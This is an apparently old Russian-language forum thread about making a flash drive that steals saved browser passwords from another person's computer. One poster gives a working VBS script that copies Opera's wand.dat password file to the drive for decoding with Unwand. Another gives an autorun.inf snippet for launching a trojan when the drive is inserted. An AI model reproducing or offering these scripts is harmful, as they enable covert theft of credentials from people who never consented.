Можно ли сделать так?: Ты вставляешь флеху в чюжой компьютер она крадёт пороли с oper'ы и IE или хотябы пороли на интернет, и копирует их на флешку или на диск C?
Еще как! Это было в одном из номеров Х! Не помню какой номер, но давно. Ничего особенного нету - бат файл и набор твого софта который делает грязные дела. А еще была статья наоборот - тебе в комп вставляют флешку а ты воруешь от туда все (особенно присматриваешся на удаленные файлы) - эту статью написал Крис Касперски тоже давно.
Если не ошибасюь в mpr функция сохранить присутствует , сохраняет mpr свои логи в расширении mpf , можно ли через cmd пользоватся mpr ,не знаю! П.С. буду признателен если кто подскажет где можно найти инфу, как в автозагрузку флешки засунуть батник или exe фаил
Ли4но я чтоб свиснуть пароли с оперы написал маленький vbs скрипт on error resume next Set FSO=CreateObject("Scripting.FileSystemObject") FSO.CopyFile "C:\Documents and Settings\имя_пользавателя\Application Data\Opera\Opera\profile\wand.dat", "F:\" и открываю етот файл с помощью проги Unwand Вот и все ___________________________ ICQ : 1840200
автозагрузка (autorun.inf) + трой к ней, ну или какойнибудь простой скрипт, как выше. Лиж бы трой был сконфигурирован с сохранением на диск. например autorun.inf: [AutoRun] OPEN=путь\к\проге.exe ICON=путь\к\иконке.exe (не обязательно) п.с. онли виндовс
кстати автораном батники не запускает, как батник автоматически стартовать? не в тему но такая задача, надо например чтобы с флешки обновленные файлы доктора веба на комп автоматически закачивадись при включении флешки )
*.cmd *.vbs кто мешает использовать? про др.веба тут или шедулер или опять скриптом cmd->copy /? думаю вполне хватит